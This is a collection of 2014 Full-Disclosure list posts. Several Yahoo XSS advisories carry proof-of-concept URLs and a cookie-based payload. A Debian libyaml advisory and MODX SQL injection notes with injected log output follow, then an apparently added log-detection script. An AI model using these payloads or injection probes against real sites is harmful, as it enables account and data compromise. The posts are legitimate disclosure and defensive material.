[Full-disclosure] Yahoo Bug Bounty Program Vulnerability #1 XSS on ads.yahoo.com

2014-03-08 Thread Stefan Schurtz


In Nov '13 I reported a Cross-site Scripting vulnerability to the Yahoo
Bug Bounty Program. As for my other reports, I've got no response or
feedback, so I wrote a message to them via email this time ... and so
on ... blah blah :)
 
To cut a long story short, for all my reports the communication with
Yahoo was really bad and of course: No bounty!

Advisory:           Yahoo Bug Bounty Program Vulnerability #1
                    XSS on ads.yahoo.com
Advisory ID:        SSCHADV2013-YahooBB-001
Author:             Stefan Schurtz
Affected Software:  Successfully tested on ads.yahoo.com
Vendor URL:         http://yahoo.com/
Vendor Status:      Seems to be fixed
Bounty:             nothing
 
==
Vulnerability Description
==
 
The '_cbv'-Parameter on http://ads.yahoo.com is prone to a Cross-site
Scripting vulnerability
 
==
PoC-Exploit
==
 
http://ads.yahoo.com/st?ad_type=iframead_size=300x250site=1181425section_code=112260532;
cb=1385497647.226089publisher_blob=${RS}|gmGLFTE4OC4mbYnzUpH6dwEQOTMuMlKVBC__yxq4
|2143911627|LREC2|1385497647.226089yud=smpv%3d3%26ed%3dzxE1dF31xQzMnXQidpJpWNtP
OVygJhcHBknzVCnpTraLTXtt8jO7OEVYpCbxEhJcwmU2x.ekTqffsDUVYgceDTs.NijijL.tGPKwsdRUsLvxftzYGe
.0VUghSSHioqjLjQJ7KaidIocpC1oj2SKC4lg_EhLiMsmgXiq6wbNVL_VzG1fHxP77ptF04VC7jL7lL1vr0iRs.r6
8cRSLiFUFzH_pvnaxUy8-_msd=1_xcf=1_exv=RDnhGI4wnN7uv.jS65VPBVAFmZBbevIBHZGnRIl5vxDV_msig=10sorm5kdrmxbkn=0_cbv=13202581681c91-alert(document.domain)-1580bfdcb31=1

==
Disclosure Timeline
==

28-Nov-2013 - vendor informed by contact form (Yahoo Bug Bounty Program)
31-Dec-2013 - next message to the Yahoo Security Contact
04-Jan-2014 - feedback from vendor
04-Jan-2014 - vendor informed again about the three vulnerabilities
06-Jan-2014 - feedback from vendor
15-Jan-2014 - contact with Jeff Zingler (Threat Response @ Yahoo)
16-Jan-2013 - contact with Jeff Zingler (Threat Response @ Yahoo) //
last contact

==
Credits
==

Vulnerability found and advisory written by Stefan Schurtz.

==
References
==

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-001.txt
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Yahoo Bug Bounty Program Vulnerability #3 XSS on de-mg42.mail.yahoo.com

2014-03-08 Thread Stefan Schurtz


Here is my last advisory which I've reported in 2013 to the Yahoo
Bug Bounty Program. And again...the same story for this report as for my
others :-/
 
If you're interested, you can read it here:
 
http://darksecurity.de/index.php?/259-Yahoo-Bug-Bounty-Program-Vulnerability-1-XSS-on-ads.yahoo.com.html
http://darksecurity.de/index.php?/254-Yahoo-Bug-Bounty-Program-Vulnerability-2-Open-Redirect.html

Advisory:           Yahoo Bug Bounty Program Vulnerability #3
                    XSS on de-mg42.mail.yahoo.com
Advisory ID:        SSCHADV2013-YahooBB-002
Author:             Stefan Schurtz
Affected Software:  Successfully tested on de-mg42.mail.yahoo.com
Vendor URL:         http://yahoo.com/
Vendor Status:      Not tested anymore
Bounty:             nothing

==
Vulnerability Description
==

The 'intl'-Parameter on https://de-mg42.mail.yahoo.com/ is prone to a
Cross-site Scripting vulnerability

==
PoC-Exploit
==

GET https://de-mg42.mail.yahoo.com/neo/launch?.rand=02j5el0e9m3mr

Host: de-mg42.mail.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:25.0) Gecko/20100101
Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: YM.SREQs.schurtz=1;
YM.NEO_114841791630661482=width=1920height=874; B=aj6vf6l8j20rvb=4
d=itbFpMNpYFMz7rPwe5JFum_ghxk-s=i8i=lvGlArFYMBIJ47eKw1fV;
RMBX=aj6vf6l8j20rvb=3s=0kt=59; V=v=0.90cc=0m=0;
POPUPCHECK=1387130698530; adx=c322590@1386248182@1;
T=z=bslqSBbANvSBRhTgC/z0ojCNjA2MAY2NjNPMzYwTjYxNDcxMTa=QAE
sk=DAA8V8EU20nhMOks=EAAl0SH4Wfzh6QOSww.4WR97g--~Ed=c2wBTVRjeE53RXhNVFE0TkRFM09URTJNekEyTmpFME9ESS0BYQFRQUUBZwFYR1lLREF
LVTdFWjU0SjY3QVJaUEYyMzZZSQFzY2lkAWJIVnpjWTF0a
DdTVFREVFJLZUtxem4yeC5DWS0BYWMBQUVERkQ5VWQBdGlwAWQ1OTc3RAFzYwF3bAF6egFic2xxU0JBN0U-;
F=a=5wuRvLEMvSo9VbE7dA3FBiS57T.ECJPqZKL7SqUSshaxgafrUTyTA2TfmjWAGc1FiTDSLSw-
b=_pW9; PH=l=de-DEi=defn=K2_4Upj6Mg1KYq4D9FKN;
SSL=v=1s=ZKphB8TnY2DMWrNEU3WnQdsBp50y6G.DA.GMkzNJBkkaUPmmwLBscSpK5X5gJjBMR671vlpoBasj8HY6cXSNbA--
kv=0; ywadp100034076556=3167627385;
fpc100034076556=ZavCj2Fd|aEGcHAwNaa|fses100034076556=|aEGcHAwNaa|
ZavCj2Fd|fvis100034076556=|8Mo080oosT|8Mo080oosT|8Mo080oosT|8|8Mo080oosT|8Mo080oosT;
ywadp1000357943879=4084605029;
fpc1000357943879=ZbHoAVDq|0UsAOAwNaa|fses1000357943879=|0UsAOAwNaa|ZbHoAVDq|fvis1000357943879=
|8Mo0807780|8Mo0807780|8Mo0807780|8|8Mo0807780|8Mo0807780; AO=o=0;
YLS=v=1p=1n=0; ucs=bnas=0eup=1;
_br_uid_2=uid%3D9863339468277%3Av%3D10.6.1%3Ats%3D1386895411464%3Ahc%3D1; 
Y=v=1n=d7kp7cfrj6gcml=i.i27khjp/o
p=m2evvde01200iz=r=sdlg=de-DEintl=dec52a6-alert(document.domain)-c8d9133635e;
U=mt=fnqDoZ2MhYjxjMnSZ.dZc46HZp7QbCgwGOhf97k-
ux=u2JrSBun=d7kp7cfrj6gcm; ypcdb=cf2c3147a30c5264ccbae29c07ec31b3;
YM=v=2u=bTYqAOaoqXPwtE2NaDnywgQ.MkXnpDL1MkqqIA--d=f=AAAt=3bKrSBs=55nr;
DK=v=2p=NnwyMzMwfFZpcnR1YWx8RGVza3RvcCBCcm93c2VyfHdpbmRvd3MgbnR8NS4x
Connection: keep-alive

==
Disclosure Timeline
==

15-Dec-2013 - vendor informed by contact form (Yahoo Bug Bounty Program)
31-Dec-2013 - next message to the Yahoo Security Contact
04-Jan-2014 - feedback from vendor
04-Jan-2014 - vendor informed again about the three vulnerabilities
06-Jan-2014 - feedback from vendor
15-Jan-2014 - contact with Jeff Zingler (Threat Response@Yahoo)
16-Jan-2013 - contact with Jeff Zingler (Threat Response@Yahoo) // last
contact

==
Credits
==

Vulnerability found and advisory written by Stefan Schurtz.

==
References
==

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-003.txt

[Full-disclosure] Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities

2014-03-08 Thread Stefan Schurtz


In Jan '14 I reported three Cross-site Scripting vulnerabilities to the
Yahoo Bug Bounty Program. And I know, it is really really hard, but ...
again ... no feedback or bounty :)

Advisory:           Yahoo Bug Bounty Program Vulnerability #4 #5 #6
                    Cross-site Scripting vulnerabilities
Advisory ID:        SSCHADV2014-YahooBB-004 / YahooBB-005 / YahooBB-006
Author:             Stefan Schurtz
Affected Software:  Successfully tested on celebrity.yahoo.com,
                    movies.yahoo.com, music.yahoo.com
Vendor URL:         http://yahoo.com/
Vendor Status:      Not tested anymore
Bounty:             nothing
 
==
Vulnerability Description
==
 
The 'mode'-Parameter on https://celebrity.yahoo.com/,
https://movies.yahoo.com/, https://music.yahoo.com/ is prone to a
Cross-site Scripting vulnerability
 
==
PoC-Exploit
==
 
http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=m_mode=instance_id=mode=multipart-alert(document.domain)-__phase=pretype=index
 
http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=m_mode=instance_id=mode=multipart-alert(document.domain)-__phase=pretype=index
 
http://music.yahoo.com/videos/?m_id=m_mode=instance_id=
mode=multipart-alert(document.domain)-__phase=pretype=index

==
Disclosure Timeline
==
 
20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)

==
Credits
==

Vulnerabilities found and advisory written by Stefan Schurtz.

==
References
==

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt

Re: [Full-disclosure] Yahoo Bug Bounty Program Vulnerability #3 XSS on de-mg42.mail.yahoo.com

2014-03-08 Thread Stefan Schurtz

Hi Jann,

you're right...bad description here (too much copy & paste) :)

The XSS is cookie-based, so you can find it in the cookie with the
payload.

Please see intl=dec52a6-alert(document.domain)-c8d9133635e;

Kind regards,
Stefan

On 08.03.2014 11:40, Jann Horn wrote:
> On Sat, Mar 08, 2014 at 11:24:03AM +0100, Stefan Schurtz wrote:
>> The 'intl'-Parameter on https://de-mg42.mail.yahoo.com/ is
>> prone to a Cross-site Scripting vulnerability [...] GET
>> https://de-mg42.mail.yahoo.com/neo/launch?.rand=02j5el0e9m3mr
>>
>> Host: de-mg42.mail.yahoo.com [...]
>
> Uh, where is that intl parameter you speak of? the only parameter
> I see here is .rand, which, as far as I know, just serves to
> circumvent caching. And where is the XSS payload?


[Full-disclosure] [SECURITY] [DSA 2870-1] libyaml-libyaml-perl security update

2014-03-08 Thread Salvatore Bonaccorso

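-------------------------------------------------------------------------
Debian Security Advisory DSA-2870-1                   secur...@debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
March 08, 2014                         http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : libyaml-libyaml-perl
Vulnerability  : heap-based buffer overflow
CVE ID         : CVE-2013-6393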

Florian Weimer of the Red Hat Product Security Team discovered a
heap-based buffer overflow flaw in LibYAML, a fast YAML 1.1 parser and
emitter library. A remote attacker could provide a YAML document with a
specially-crafted tag that, when parsed by an application using libyaml,
would cause the application to crash or, potentially, execute arbitrary
code with the privileges of the user running the application.

This update corrects this flaw in the copy that is embedded in the
libyaml-libyaml-perl package.

For the oldstable distribution (squeeze), this problem has been fixed in
version 0.33-1+squeeze2.

For the stable distribution (wheezy), this problem has been fixed in
version 0.38-3+deb7u1.

For the testing distribution (jessie), this problem has been fixed in
version 0.41-4.

For the unstable distribution (sid), this problem has been fixed in
version 0.41-4.

We recommend that you upgrade your libyaml-libyaml-perl packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org


[Full-disclosure] MODX SQLi from oss-sec

2014-03-08 Thread Brandon Perry
The author of the email to the oss-sec says he isn't sure if the linked
commit fixes the issue and it should.

You can exploit this possibly using a blind time or boolean sqli. This is
me just playing around after doing some code analysis. Possibly other
connectors are affected? No idea about whether authentication will be
needed for all vectors, but in my cursory testing it needed at least a
PHPSESSID cookie (maybe just get first index to get anon PHPSESSID, who
knows).

[2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Error 42000 executing statement:
Array
(
    [0] => 42000
    [1] => 1064
    [2] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=1' at line 1
)

[2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Could not prepare context: mgr 1=1
[2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Error 42S22 executing statement:
Array
(
    [0] => 42S22
    [1] => 1054
    [2] => Unknown column 'mgr' in 'where clause'
)

[2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Could not prepare context: mgr and 1=1
[2014-03-08 11:03:54] (ERROR @ /modx/connectors/lang.js.php) Error 42S22 executing statement:
Array
(
    [0] => 42S22
    [1] => 1054
    [2] => Unknown column 'mgr' in 'where clause'
)



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
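
One way to turn the log excerpt above into a detection, as an added example that is not part of the original post or of MODX's own code: it parses error-log entries in the format shown and reports a source file when an SQL parse error (SQLSTATE 42000 or 42S22) coincides with a "Could not prepare context:" value that is not a plain identifier. The sample log is constructed from the lines above; the identifier pattern for valid context keys and the `/modx/index.php` line are assumptions.

```python
import re
from collections import defaultdict

# Entry header in the MODX error-log format shown in the excerpt above.
ENTRY = re.compile(r"^\[(?P<ts>[\d-]+ [\d:]+)\] \(\w+ @ (?P<src>[^)]+)\) (?P<msg>.*)$")
SQLSTATE = re.compile(r"^Error (?P<state>[0-9A-Z]{5}) executing statement:")
CONTEXT = re.compile(r"^Could not prepare context: (?P<key>.*)$")
# Assumption: a legitimate context key is a plain identifier such as "web" or "mgr".
VALID_KEY = re.compile(r"^[A-Za-z0-9_-]{1,100}$")
SUSPICIOUS_STATES = {"42000", "42S22"}  # syntax error, unknown column

def parse_entries(text):
    """Return (timestamp, source, message) tuples, folding continuation lines into the message."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            entries.append([m["ts"], m["src"], m["msg"]])
        elif entries and line.strip():
            entries[-1][2] += " " + line.strip()
    return [tuple(e) for e in entries]

def find_injection_probes(text):
    """Report sources where an SQL parse error coincides with a non-identifier context key."""
    seen = defaultdict(lambda: {"states": [], "bad_keys": []})
    for ts, src, msg in parse_entries(text):
        state, ctx = SQLSTATE.match(msg), CONTEXT.match(msg)
        if state and state["state"] in SUSPICIOUS_STATES:
            seen[src]["states"].append((ts, state["state"]))
        elif ctx and not VALID_KEY.match(ctx["key"].strip()):
            seen[src]["bad_keys"].append((ts, ctx["key"].strip()))
    return {src: f for src, f in seen.items() if f["states"] and f["bad_keys"]}

# Constructed sample: the excerpt's entries unwrapped, plus one benign line (assumed path).
SAMPLE_LOG = """\
[2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Error 42000 executing statement:
Array
(
    [0] => 42000
    [1] => 1064
    [2] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=1' at line 1
)
[2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Could not prepare context: mgr 1=1
[2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Error 42S22 executing statement:
Array
(
    [0] => 42S22
    [1] => 1054
    [2] => Unknown column 'mgr' in 'where clause'
)
[2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Could not prepare context: mgr and 1=1
[2014-03-08 11:05:10] (ERROR @ /modx/index.php) Could not prepare context: web
"""
```

Requiring both signals keeps ordinary failures quiet: the constructed `web` line is a well-formed key with no SQL error beside it, so its source is not reported.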

Re: [Full-disclosure] MODX SQLi from oss-sec

2014-03-08 Thread Brandon Perry
Sorry, oss-sec link:
http://seclists.org/oss-sec/2014/q1/532



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [Full-disclosure] MODX SQLi from oss-sec

2014-03-08 Thread Brandon Perry
FWIW I believe it is this line that is vulnerable in particular. I can't
prove this at the moment though:

core/model/modx/processors/resource/getnodes.class.php:134:
 (SELECT COUNT(*) FROM {$this->modx->getTableName('modResource')} WHERE
context_key = modContext.{$this->modx->escape('key')} AND id IN
({$this->defaultRootId})) > 0,




-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website